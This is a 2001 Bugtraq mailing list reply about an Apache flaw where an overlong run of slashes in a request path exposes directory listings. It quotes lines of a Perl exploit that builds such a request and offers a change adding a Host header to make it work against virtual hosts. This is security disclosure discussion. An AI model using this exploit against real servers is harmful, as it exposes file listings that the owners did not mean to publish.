Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
From: Stephen Cope <mail-d-20010615 () kimihia org nz>
Date: Fri, 15 Jun 2001 14:48:44 +1200

In my testing you need to take the Host header into account.

:   $url = "GET ";
:   $buffer = "/" x $low . " HTTP/1.0\r\n";
:   $end = "\r\n\r\n";

The server I tested against uses mod_rewrite to do virtual hosting, and it
arrived at a different magic number with the host header, and against
without the header.

I made the following change to the above code:

  $buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";

Should be fairly easy to understand.

-- 
Stephen Cope <http://sdc.org.nz/>
Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault